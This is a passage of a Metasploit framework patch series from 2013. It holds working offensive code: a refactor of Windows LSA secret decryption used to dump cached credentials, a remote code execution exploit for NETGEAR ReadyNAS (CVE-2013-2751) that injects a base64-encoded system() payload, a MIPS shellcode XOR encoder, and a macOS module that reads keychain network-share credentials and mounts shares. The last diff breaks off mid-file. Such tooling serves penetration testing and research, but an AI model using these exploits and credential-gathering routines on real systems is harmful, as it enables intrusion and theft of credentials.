+    decrypted_data = ''
 
     for i in (60...pol.length).step(16)
       aes.decrypt
       aes.padding = 0
       xx = aes.update(pol[i...i+16])
-      decryptedkey += xx
+      decrypted_data += xx
     end
-    vprint_good("Dec_Key #{decryptedkey}")
+    vprint_good("Dec_Key #{decrypted_data}")
+
+    return decrypted_data
+  end
+
+  # Decrypts "Secret" encrypted data
+  # Ruby implementation of SystemFunction005
+  # the original python code has been taken from Credump
+  #
+  def decrypt_secret_data(secret, key)
+
+    j = 0
+    decrypted_data = ''
+
+    for i in (0...secret.length).step(8)
+      enc_block = secret[i..i+7]
+      block_key = key[j..j+6]
+      des_key = convert_des_56_to_64(block_key)
+      d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
+
+      d1.padding = 0
+      d1.key = des_key
+      d1o = d1.update(enc_block)
+      d1o << d1.final
+      decrypted_data += d1o
+      j += 7
+      if (key[j..j+7].length < 7 )
+        j = key[j..j+7].length
+      end
+    end
+    dec_data_len = decrypted_data[0].ord
+
+    return decrypted_data[8..8+dec_data_len]
 
-    return decryptedkey
   end
 
 end
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index 76d1c02aa2..f53159a6cc 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -53,36 +53,6 @@ class Metasploit3 < Msf::Post
     end
   end
 
-  def decrypt_secret(secret, key)
-
-    # Ruby implementation of SystemFunction005
-    # the original python code has been taken from Credump
-
-    j = 0
-    decrypted_data = ''
-
-    for i in (0...secret.length).step(8)
-      enc_block = secret[i..i+7]
-      block_key = key[j..j+6]
-      des_key = convert_des_56_to_64(block_key)
-      d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
-
-      d1.padding = 0
-      d1.key = des_key
-      d1o = d1.update(enc_block)
-      d1o << d1.final
-      decrypted_data += d1o
-      j += 7
-      if (key[j..j+7].length < 7 )
-        j = key[j..j+7].length
-      end
-    end
-    dec_data_len = decrypted_data[0].ord
-
-    return decrypted_data[8..8+dec_data_len]
-
-  end
-
   def capture_nlkm(lsakey)
     ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ)
     nlkm = ok.query_value("").data
@@ -91,9 +61,9 @@ class Metasploit3 < Msf::Post
     print_status("Encrypted NL$KM: #{nlkm.unpack("H*")[0]}") if( datastore['DEBUG'] )
 
     if( @vista == 1 )
-      nlkm_dec = decrypt_lsa( nlkm[0..-1], lsakey)
+      nlkm_dec = decrypt_lsa_data( nlkm[0..-1], lsakey)
     else
-      nlkm_dec = decrypt_secret( nlkm[0xC..-1], lsakey)
+      nlkm_dec = decrypt_secret_data( nlkm[0xC..-1], lsakey)
     end
 
     return nlkm_dec
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 36092f189f..5466a72af9 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -30,36 +30,6 @@ class Metasploit3 < Msf::Post
     ))
   end
 
-  def decrypt_secret(secret, key)
-
-    # Ruby implementation of SystemFunction005
-    # the original python code has been taken from Credump
-
-    j = 0
-    decrypted_data = ''
-
-    for i in (0...secret.length).step(8)
-      enc_block = secret[i..i+7]
-      block_key = key[j..j+6]
-      des_key = convert_des_56_to_64(block_key)
-      d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
-
-      d1.padding = 0
-      d1.key = des_key
-      d1o = d1.update(enc_block)
-      d1o << d1.final
-      decrypted_data += d1o
-      j += 7
-      if (key[j..j+7].length < 7 )
-        j = key[j..j+7].length
-      end
-    end
-    dec_data_len = decrypted_data[0].ord
-
-    return decrypted_data[8..8+dec_data_len]
-
-  end
-
   def reg_getvaldata(key,valname)
     v = nil
     begin
@@ -97,11 +67,11 @@ class Metasploit3 < Msf::Post
           if( @vista == 1 )
             #Magic happens here
             sec = sec[0..-1]
-            sec = decrypt_lsa(sec, lkey)[1..-1].scan(/[[:print:]]/).join
+            sec = decrypt_lsa_data(sec, lkey)[1..-1].scan(/[[:print:]]/).join
           else
             #and here
             sec = sec[0xC..-1]
-            sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join
+            sec = decrypt_secret_data(sec, lkey).scan(/[[:print:]]/).join
           end
 
           if(sec.length > 0)

From 72f686d99a18c3c3053c29a44bc12f3996ea592d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Thu, 24 Oct 2013 16:10:32 -0500
Subject: [PATCH 015/217] Add module for CVE-2013-2751

---
 .../linux/http/netgear_readynas_exec.rb       | 90 +++++++++++++++++++
 1 file changed, 90 insertions(+)
 create mode 100644 modules/exploits/linux/http/netgear_readynas_exec.rb

diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb
new file mode 100644
index 0000000000..caefabdd17
--- /dev/null
+++ b/modules/exploits/linux/http/netgear_readynas_exec.rb
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'NETGEAR ReadyNAS Perl Code Evaluation',
+      'Description'    => %q{
+        This module exploits a Perl code injection on NETGEAR ReadyNAS 4.2.23 and 4.1.11. The
+        vulnerability exists on the web fronted, specifically on the np_handler.pl component,
+        due to the insecure usage of the eval() perl function. This module has been tested
+        successfully on a NETGEAR ReadyNAS 4.2.23 Firmware emulated environment, not on real
+        hardware.
+      },
+      'Author'         =>
+        [
+          'Craig Young ', # Vulnerability discovery
+          'hdm',          # diff the patch
+          'juan vazquez'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-2751' ],
+          [ 'OSVDB', '98826' ],
+          [ 'URL', 'http://www.tripwire.com/state-of-security/vulnerability-management/readynas-flaw-allows-root-access-unauthenticated-http-request/' ],
+          [ 'URL', 'http://www.tripwire.com/register/security-advisory-netgear-readynas/' ]
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'Space'       => 4096, # Has into account Apache request length and base64 ratio
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic perl telnet'
+            }
+        },
+      'Targets'        =>
+        [
+          [ 'NETGEAR ReadyNAS 4.2.23', { }]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true
+        },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 12 2013'
+      ))
+
+  end
+
+  def send_request_payload(payload)
+    res = send_request_cgi({
+      'uri' => normalize_uri("/np_handler", ""),
+      'vars_get' => {
+         'PAGE' =>'Nasstate',
+         'OPERATION' => 'get',
+         'SECTION' => payload
+      }
+    })
+    return res
+  end
+
+  def check
+    res = send_request_payload(")")
+    if res and res.code == 200 and res.body =~ /syntax error at \(eval/
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    my_payload = "#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\")"
+    print_status("#{peer} - Executing payload...")
+    send_request_payload(my_payload)
+  end
+
+end

From dd094eee04b8a3ca9422082e516bf800b53bb202 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Thu, 24 Oct 2013 16:30:26 -0500
Subject: [PATCH 016/217] Use 443 by default with SSL

---
 modules/exploits/linux/http/netgear_readynas_exec.rb | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb
index caefabdd17..14326d1f31 100644
--- a/modules/exploits/linux/http/netgear_readynas_exec.rb
+++ b/modules/exploits/linux/http/netgear_readynas_exec.rb
@@ -59,6 +59,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => 'Jul 12 2013'
       ))
 
+    register_options(
+      [
+        Opt::RPORT(443)
+      ], self.class)
+
   end
 
   def send_request_payload(payload)

From c92e8ff98dc6d0f0ed6b31b097bc3219d46418f9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Wed, 30 Oct 2013 19:34:54 -0500
Subject: [PATCH 017/217] Delete extra space

---
 modules/exploits/linux/http/netgear_readynas_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb
index 14326d1f31..7dd63676a4 100644
--- a/modules/exploits/linux/http/netgear_readynas_exec.rb
+++ b/modules/exploits/linux/http/netgear_readynas_exec.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Craig Young ', # Vulnerability discovery
+          'Craig Young', # Vulnerability discovery
           'hdm',          # diff the patch
           'juan vazquez'  # Metasploit module
         ],

From 594ee4239867d8973a28a15e2e2d03e38f3efa17 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sat, 2 Nov 2013 10:10:51 -0500
Subject: [PATCH 018/217] Add byte xori mipsbe encoder

---
 modules/encoders/mipsbe/byte_xori.rb | 146 +++++++++++++++++++++++++++
 1 file changed, 146 insertions(+)
 create mode 100644 modules/encoders/mipsbe/byte_xori.rb

diff --git a/modules/encoders/mipsbe/byte_xori.rb b/modules/encoders/mipsbe/byte_xori.rb
new file mode 100644
index 0000000000..b5647b87ca
--- /dev/null
+++ b/modules/encoders/mipsbe/byte_xori.rb
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'metasm'
+
+
+class Metasploit3 < Msf::Encoder::Xor
+
+  Rank = NormalRanking
+
+  def initialize
+    super(
+      'Name'             => 'Byte XORi Encoder',
+      'Description'      => %q{
+        Mips Web server exploit friendly xor encoder. This encoder has been found useful on
+        situations where '&' (0x26) is a badchar. Since 0x26 is the xor's opcode on MIPS
+        architectures, this one is based on the xori instruction.
+      },
+      'Author'           =>
+        [
+          'Julien Tinnes <julien at cr0.org>', # original longxor encoder, which this one is based on
+          'juan vazquez' # byte_xori encoder
+        ],
+      'Arch'             => ARCH_MIPSBE,
+      'License'          => MSF_LICENSE,
+      'Decoder'          =>
+        {
+          'KeySize'   => 1,
+          'BlockSize' => 1,
+          'KeyPack'   => 'C',
+        })
+  end
+
+  #
+  # Returns the decoder stub that is adjusted for the size of the buffer
+  # being encoded.
+  #
+  def decoder_stub(state)
+
+    # add 4 number of passes  for the space reserved for the key, at the end of the decoder stub
+    # (see commented source)
+    number_of_passes=state.buf.length+4
+    raise InvalidPayloadSizeException.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 32766
+
+    # 16-bits not (again, see also commented source)
+    reg_14 = (number_of_passes+1)^0xFFFF
+
+    decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<EOS).encoded.data
+main:
+
+li macro reg, imm
+  addiu reg, $0, imm                     ; 0x24xxyyyy - xx: reg #, yyyy: imm # imm must be equal or less than 0x7fff
+endm
+
+  li      ($14, #{reg_14})               ; 0x240exxxx - store in $14 the number of passes (two's complement) - xxxx (number of passes)
+  nor     $14, $14, $0                   ; 0x01c07027 - get in $14 the number of passes
+  li      ($11,-69)                      ; 0x240bffbb - store in $11 the offset to the end of the decoder (two's complement) (from the addu instr)
+
+; acts as getpc
+next:
+  bltzal  $8, next                       ; 0x0510ffff - branch to next if $8 < 0, store return address in $31 ($ra); pipelining executes next instr.
+  slti    $8, $0, 0x#{slti_imm(state)}   ; 0x2808xxxx - Set $8 = 0; Set $8 = 1 if $0 < imm; else $8 = 0 / xxxx: imm
+
+  nor     $11, $11, $0                   ; 0x01605827 - get in $11 the offset to the end of the decoder (from the addu instr)
+  addu    $25, $31, $11                  ; 0x03ebc821 - get in $25 a pointer to the end of the decoder stub
+
+  slti    $23, $0, 0x#{slti_imm(state)}  ; 0x2817xxxx - Set $23 = 0 (Set $23 = 1 if $0 < imm; else $23 = 0) / xxxx: imm
+  lb      $17, -1($25)                   ; 0x8f31fffc - Load xor key in $17 (stored on the last byte of the decoder stub)
+
+; Init $6 and $15
+  li      ($13, -4)                      ; 0x240dfffc - $13 = -4
+  nor     $6, $13, $0                    ; 0x01a03027 - $6 = 3 ; used to easily get the cacheflush parameter
+  addi    $15, $6, -2                    ; 0x20cffffe - $15 = 1 ($15 = decoding loop counter increment)
+
+; In order avoid null bytes, decode also the xor key, so memory can be
+; referenced with offset -1
+loop:
+  lb      $8, -4($25)                    ; 0x8f28fffc - Load in $8 the byte to decode
+  addu    $23, $23, $15                  ; 0x02efb821 - Increment the counter ($23)
+  xori    $3, $8, 0x#{padded_key(state)} ; 0x01111826 - xori decoding instruction, store the decoded byte on $3
+  #{set_on_less_than(state)}             ; 0x02eef0xx - $30 = 1 if $23 < $14; else $30 = 0 (update branch condition) / xx: 0x2b if slti, 0x2a if slt
+  sb      $3, -4($25)                    ; 0xaf23fffc - Store decoded byte on memory
+  bne     $0, $30, loop                  ; 0x17c0fff9 - branch to loop if $30 != 0 (ranch while bytes to decode)
+  addu    $25, $25, $15                  ; 0x032dc821 - next instruction to decode, executed because of the pipelining
+
+  li      ($2, 4147)                     ; 0x24021033 - cacheflush sytem call
+  syscall 0x52950                        ; 0x014a540c
+  nop                                    ; encoded shellcoded must be here (xor key right here ;) after decoding will result in a nop
+EOS
+
+    return decoder
+  end
+
+
+  def padded_key(state, size=1)
+    key = Rex::Text.rand_text(size, state.badchars)
+    key << [state.key].pack("C")
+    return key.unpack("n")[0].to_s(16)
+  end
+
+  # Returns an two-bytes immediate value without badchars. The value must be
+  # on the 0x8000-0x8fff so it is used as negative value by slti (set less
+  # than signed immediate)
+  def slti_imm(state)
+    imm = Rex::Text.rand_text(2, state.badchars + (0x00..0x7f).to_a.pack("C*"))
+    return imm.unpack("n")[0].to_s(16)
+  end
+
+  # Since 0x14 contains the number of passes, and because of the li macro, can't be
+  # longer than 0x7fff, both sltu (unsigned) and slt (signed) operations can be used
+  # here
+  def set_on_less_than(state)
+    instructions = {
+      "sltu   $30, $23, $14" => "\x02\xee\xf0\x2b", # set less than unsigned
+      "slt    $30, $23, $14" => "\x02\xee\xf0\x2a"  # set less than
+    }
+
+    instructions.each do |k,v|
+      if Rex::Text.badchar_index(v, state.badchars) == nil
+        return k
+      end
+    end
+
+    raise BadcharError.new,
+          "The #{self.name} encoder failed to encode the decoder stub without bad characters.",
+          caller
+  end
+
+  def encode_finalize_stub(state, stub)
+    # Including the key into the stub by ourselves because it should be located
+    # in the last 4 bytes of the decoder stub. In this way decoding will convert
+    # these bytes into a nop instruction (0x00000000). The Msf::Encoder only supports
+    # one decoder_key_offset position
+    real_key = state.key
+    stub[-4, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
+    stub[-3, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
+    stub[-2, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
+    stub[-1, state.decoder_key_size] = [ real_key.to_i ].pack(state.decoder_key_pack)
+    return stub
+  end
+
+end

From 049111cd94628d59969e9f43c74b6b5af577adba Mon Sep 17 00:00:00 2001
From: Peter Toth <peter.toth@sucaba.eu>
Date: Wed, 13 Nov 2013 11:21:39 +0100
Subject: [PATCH 019/217] In progress

---
 modules/post/osx/manage/mount_share.rb | 134 +++++++++++++++++++++++++
 1 file changed, 134 insertions(+)
 create mode 100644 modules/post/osx/manage/mount_share.rb

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
new file mode 100644
index 0000000000..fb04cc9810
--- /dev/null
+++ b/modules/post/osx/manage/mount_share.rb
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'OSX ',
+        'Description'   => %q{
+          This module lists VPN connections and tries to connect to them using stored credentials.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        =>
+          [
+            'Peter Toth <globetother[at]gmail.com>'
+          ],
+        'Platform'      => [ 'osx' ],
+        'SessionTypes'  => [ 'shell', 'meterpreter' ],
+        'Actions'       => [
+          [ 'LIST',     { 'Description' => 'Show a list of VPN connections' } ],
+          [ 'CONNECT', { 'Description' => 'Connect to a VPN using stored credentials' } ],
+          [ 'DISCONNECT', { 'Description' => 'Disconnect from a VPN' } ]
+        ],
+        'DefaultAction' => 'LIST'
+      ))
+
+    register_options(
+      [
+        OptString.new('VPN_CONNECTION', [true, 'Name of VPN connection. `set ACTION LIST` to get a list.', 'OSX_VPN']),
+        OptString.new('SCUTIL_PATH', [true, 'Path to the scutil executable.', '/usr/sbin/scutil']),
+        OptString.new('NETWORKSETUP_PATH', [true, 'Path to the networksetup executable.', '/usr/sbin/networksetup'])
+      ], self.class)
+
+  end
+
+  STR_CONNECTED = '* (Connected)'
+  STR_DISCONNECTED = '* (Disconnected)'
+
+  def run
+    fail_with("Invalid action") if action.nil?
+
+    if action.name == 'LIST'
+      data = get_vpn_list()
+      connected_names = parse_vpn_connection_names(data, true)
+      disconnected_names = parse_vpn_connection_names(data, false)
+      if connected_names.length > 0
+        print_status("VPN Connections Status: UP")
+        connected_names.each do |vpn_name|
+          print_good('  ' + vpn_name)
+        end
+      end
+      if disconnected_names.length > 0
+        print_status("VPN Connections Status: DOWN")
+        disconnected_names.each do |vpn_name|
+          print_good('  ' + vpn_name)
+        end
+      end
+    elsif action.name == 'CONNECT'
+      connect_vpn(true)
+    elsif action.name == 'DISCONNECT'
+      connect_vpn(false)
+    end
+  end
+
+  def get_vpn_list()
+    vprint_status(datastore['SCUTIL_PATH'].shellescape + " --nc list")
+    data = cmd_exec(datastore['SCUTIL_PATH'].shellescape + " --nc list")
+    return data
+  end
+
+  def parse_vpn_connection_names(data, show_up)
+    lines = data.split(/\n/).map(&:strip)
+    connection_names = Array.new()
+
+    lines.each do |line|
+      if show_up && line.start_with?(STR_CONNECTED)
+        connection_names.push(line.split('"')[1])
+      elsif !show_up && line.start_with?(STR_DISCONNECTED)
+        connection_names.push(line.split('"')[1])
+      end
+    end
+    return connection_names
+  end
+
+  def connect_vpn(up)
+    vpn_name = datastore['VPN_CONNECTION']
+    if up
+      header = "Connecting to VPN: #{vpn_name}"
+      connection_state = STR_CONNECTED
+      connection_unnecessary = "#{vpn_name} already connected"
+    else
+      header = "Disconnecting from VPN: #{vpn_name}"
+      connection_state = STR_DISCONNECTED
+      connection_unnecessary = "#{vpn_name} already disconnected"
+    end
+
+    print_status(header)
+    data = get_vpn_list()
+    lines = data.split(/\n/).map(&:strip)
+
+    identifier = nil
+    lines.each do |line|
+      if line.split('"')[1] == vpn_name
+        if line.start_with?(connection_state)
+          print_status(connection_unnecessary)
+          return
+        end
+        identifier = line.split(' ')[2]
+        break
+      end
+    end
+
+    if identifier.nil?
+      print_error("#{vpn_name} not found")
+      return
+    end
+
+    if up
+      cmd = datastore['NETWORKSETUP_PATH'].shellescape + " -connectpppoeservice '#{vpn_name}'"
+    else
+      cmd = datastore['SCUTIL_PATH'].shellescape + " --nc stop #{identifier}"
+    end
+    vprint_status(cmd)
+    cmd_exec(cmd)
+  end
+end

From 76660b858c80e399e3e0a93d92316109b57d6f9b Mon Sep 17 00:00:00 2001
From: Peter Toth <peter.toth@sucaba.eu>
Date: Wed, 13 Nov 2013 12:32:49 +0100
Subject: [PATCH 020/217] In progress

---
 modules/post/osx/manage/mount_share.rb | 118 +++++++++----------------
 1 file changed, 40 insertions(+), 78 deletions(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index fb04cc9810..a48cda8d20 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -13,9 +13,9 @@ class Metasploit3 < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-        'Name'          => 'OSX ',
+        'Name'          => 'OSX Network Share Mounter',
         'Description'   => %q{
-          This module lists VPN connections and tries to connect to them using stored credentials.
+          This module lists saved network shares and tries to connect to them using stored credentials.
         },
         'License'       => MSF_LICENSE,
         'Author'        =>
@@ -25,109 +25,71 @@ class Metasploit3 < Msf::Post
         'Platform'      => [ 'osx' ],
         'SessionTypes'  => [ 'shell', 'meterpreter' ],
         'Actions'       => [
-          [ 'LIST',     { 'Description' => 'Show a list of VPN connections' } ],
-          [ 'CONNECT', { 'Description' => 'Connect to a VPN using stored credentials' } ],
-          [ 'DISCONNECT', { 'Description' => 'Disconnect from a VPN' } ]
+          [ 'LIST',     { 'Description' => 'Show a list of stored network share credentials' } ],
+          [ 'CONNECT', { 'Description' => 'Connect to a network share using stored credentials' } ],
+          [ 'DISCONNECT', { 'Description' => 'Disconnect a mounted volume' } ]
         ],
         'DefaultAction' => 'LIST'
       ))
 
     register_options(
       [
-        OptString.new('VPN_CONNECTION', [true, 'Name of VPN connection. `set ACTION LIST` to get a list.', 'OSX_VPN']),
-        OptString.new('SCUTIL_PATH', [true, 'Path to the scutil executable.', '/usr/sbin/scutil']),
-        OptString.new('NETWORKSETUP_PATH', [true, 'Path to the networksetup executable.', '/usr/sbin/networksetup'])
+        OptString.new('SHARE', [true, 'Name of network share connection. `set ACTION LIST` to get a list.', 'localhost']),
+        OptString.new('SECURITY_PATH', [true, 'Path to the security executable.', '/usr/bin/security']),
+        OptString.new('OSASCRIPT_PATH', [true, 'Path to the osascript executable.', '/usr/bin/osascript']),
+        OptString.new('PROTOCOL', [true, 'Network share protocol. `set ACTION LIST` to get a list.', 'smb'])
       ], self.class)
 
   end
 
-  STR_CONNECTED = '* (Connected)'
-  STR_DISCONNECTED = '* (Disconnected)'
-
   def run
     fail_with("Invalid action") if action.nil?
 
     if action.name == 'LIST'
-      data = get_vpn_list()
-      connected_names = parse_vpn_connection_names(data, true)
-      disconnected_names = parse_vpn_connection_names(data, false)
-      if connected_names.length > 0
-        print_status("VPN Connections Status: UP")
-        connected_names.each do |vpn_name|
-          print_good('  ' + vpn_name)
-        end
-      end
-      if disconnected_names.length > 0
-        print_status("VPN Connections Status: DOWN")
-        disconnected_names.each do |vpn_name|
-          print_good('  ' + vpn_name)
+      data = get_share_list()
+      if data.length == 0
+        print_status("No Network Share credentials were found in the keyrings")
+      else
+        print_status("Protocol\tShare Name")
+        data.each do |line|
+          print_good(line)
         end
       end
     elsif action.name == 'CONNECT'
-      connect_vpn(true)
+      connect()
     elsif action.name == 'DISCONNECT'
       connect_vpn(false)
     end
   end
 
-  def get_vpn_list()
-    vprint_status(datastore['SCUTIL_PATH'].shellescape + " --nc list")
-    data = cmd_exec(datastore['SCUTIL_PATH'].shellescape + " --nc list")
-    return data
-  end
-
-  def parse_vpn_connection_names(data, show_up)
-    lines = data.split(/\n/).map(&:strip)
-    connection_names = Array.new()
-
-    lines.each do |line|
-      if show_up && line.start_with?(STR_CONNECTED)
-        connection_names.push(line.split('"')[1])
-      elsif !show_up && line.start_with?(STR_DISCONNECTED)
-        connection_names.push(line.split('"')[1])
+  def get_share_list()
+    vprint_status(datastore['SECURITY_PATH'].shellescape + " dump")
+    data = cmd_exec(datastore['SECURITY_PATH'].shellescape + " dump")
+    # Grep for desc srvr and ptcl
+    tmp = Array.new()
+    data.split("\n").each do |line|
+      unless line !~ /desc|srvr|ptcl/
+        tmp.push(line)
       end
     end
-    return connection_names
-  end
-
-  def connect_vpn(up)
-    vpn_name = datastore['VPN_CONNECTION']
-    if up
-      header = "Connecting to VPN: #{vpn_name}"
-      connection_state = STR_CONNECTED
-      connection_unnecessary = "#{vpn_name} already connected"
-    else
-      header = "Disconnecting from VPN: #{vpn_name}"
-      connection_state = STR_DISCONNECTED
-      connection_unnecessary = "#{vpn_name} already disconnected"
-    end
-
-    print_status(header)
-    data = get_vpn_list()
-    lines = data.split(/\n/).map(&:strip)
-
-    identifier = nil
-    lines.each do |line|
-      if line.split('"')[1] == vpn_name
-        if line.start_with?(connection_state)
-          print_status(connection_unnecessary)
-          return
-        end
-        identifier = line.split(' ')[2]
-        break
+    # Go through the list, find the saved Network Password descriptions
+    # and their corresponding ptcl and srvr attributes
+    list = Array.new()
+    for x in 0..tmp.length-1
+      if tmp[x] =~ /"desc"<blob>="Network Password"/
+        protocol = tmp[x+1].gsub(/^.*\=\"/, '').gsub(/\w*\"\w*$/, '')
+        server = tmp[x+2].gsub(/^.*\=\"/, '').gsub(/\"\w*$/, '')
+        list.push(protocol + "\t" + server)
       end
     end
+    return list.sort
+  end
 
-    if identifier.nil?
-      print_error("#{vpn_name} not found")
-      return
-    end
-
-    if up
-      cmd = datastore['NETWORKSETUP_PATH'].shellescape + " -connectpppoeservice '#{vpn_name}'"
-    else
-      cmd = datastore['SCUTIL_PATH'].shellescape + " --nc stop #{identifier}"
-    end
+  def connect()
+    share_name = datastore['SHARE'].shellescape
+    protocol = datastore['PROTOCOL'].shellescape
+    print_status("Connecting to #{protocol}://#{share_name}")
+    cmd = "osascript -e 'tell app \"finder\" to mount volume \"#{protocol}://#{share_name}\"'"
     vprint_status(cmd)
     cmd_exec(cmd)
   end

From 0c096c10fb31eac1f04330c3a311344f9168f64b Mon Sep 17 00:00:00 2001
From: Peter Toth <peter.toth@sucaba.eu>
Date: Wed, 13 Nov 2013 17:03:38 +0100
Subject: [PATCH 021/217] Submitting first version for pull request

---
 modules/post/osx/manage/mount_share.rb | 72 +++++++++++++++++++-------
 1 file changed, 53 insertions(+), 19 deletions(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index a48cda8d20..0cf1ac3415 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post
     super( update_info( info,
         'Name'          => 'OSX Network Share Mounter',
         'Description'   => %q{
-          This module lists saved network shares and tries to connect to them using stored credentials.
+          This module lists saved network shares and tries to connect to them using stored credentials. This does not require root privileges.
         },
         'License'       => MSF_LICENSE,
         'Author'        =>
@@ -26,15 +26,15 @@ class Metasploit3 < Msf::Post
         'SessionTypes'  => [ 'shell', 'meterpreter' ],
         'Actions'       => [
           [ 'LIST',     { 'Description' => 'Show a list of stored network share credentials' } ],
-          [ 'CONNECT', { 'Description' => 'Connect to a network share using stored credentials' } ],
-          [ 'DISCONNECT', { 'Description' => 'Disconnect a mounted volume' } ]
+          [ 'MOUNT', { 'Description' => 'Mount a network shared volume using stored credentials' } ],
+          [ 'UNMOUNT', { 'Description' => 'Unmount a mounted volume' } ]
         ],
         'DefaultAction' => 'LIST'
       ))
 
     register_options(
       [
-        OptString.new('SHARE', [true, 'Name of network share connection. `set ACTION LIST` to get a list.', 'localhost']),
+        OptString.new('VOLUME', [true, 'Name of network share volume. `set ACTION LIST` to get a list.', 'localhost']),
         OptString.new('SECURITY_PATH', [true, 'Path to the security executable.', '/usr/bin/security']),
         OptString.new('OSASCRIPT_PATH', [true, 'Path to the osascript executable.', '/usr/bin/osascript']),
         OptString.new('PROTOCOL', [true, 'Network share protocol. `set ACTION LIST` to get a list.', 'smb'])
@@ -46,37 +46,51 @@ class Metasploit3 < Msf::Post
     fail_with("Invalid action") if action.nil?
 
     if action.name == 'LIST'
-      data = get_share_list()
-      if data.length == 0
+      saved_shares = get_share_list
+      if saved_shares.length == 0
         print_status("No Network Share credentials were found in the keyrings")
       else
+        print_status("Network shares saved in keyrings:")
         print_status("Protocol\tShare Name")
-        data.each do |line|
+        saved_shares.each do |line|
           print_good(line)
         end
       end
-    elsif action.name == 'CONNECT'
-      connect()
-    elsif action.name == 'DISCONNECT'
-      connect_vpn(false)
+      mounted_shares = get_mounted_list
+      if mounted_shares.length == 0
+        print_status("No volumes found in /Volumes")
+      else
+        print_status("Mounted Volumes:")
+        mounted_shares.each do |line|
+          print_good(line)
+        end
+      end
+    elsif action.name == 'MOUNT'
+      mount
+    elsif action.name == 'UNMOUNT'
+      unmount
     end
   end
 
-  def get_share_list()
+  def get_share_list
     vprint_status(datastore['SECURITY_PATH'].shellescape + " dump")
     data = cmd_exec(datastore['SECURITY_PATH'].shellescape + " dump")
     # Grep for desc srvr and ptcl
-    tmp = Array.new()
-    data.split("\n").each do |line|
+    tmp = []
+    lines = data.lines
+    lines.each do |line|
+      line.strip!
       unless line !~ /desc|srvr|ptcl/
         tmp.push(line)
       end
     end
     # Go through the list, find the saved Network Password descriptions
     # and their corresponding ptcl and srvr attributes
-    list = Array.new()
+    list = []
     for x in 0..tmp.length-1
-      if tmp[x] =~ /"desc"<blob>="Network Password"/
+      if tmp[x] =~ /"desc"<blob>="Network Password"/ && x < tmp.length-3
+        # Remove everything up to the double-quote after the equal sign,
+        # and also the trailing double-quote
         protocol = tmp[x+1].gsub(/^.*\=\"/, '').gsub(/\w*\"\w*$/, '')
         server = tmp[x+2].gsub(/^.*\=\"/, '').gsub(/\"\w*$/, '')
         list.push(protocol + "\t" + server)
@@ -85,12 +99,32 @@ class Metasploit3 < Msf::Post
     return list.sort
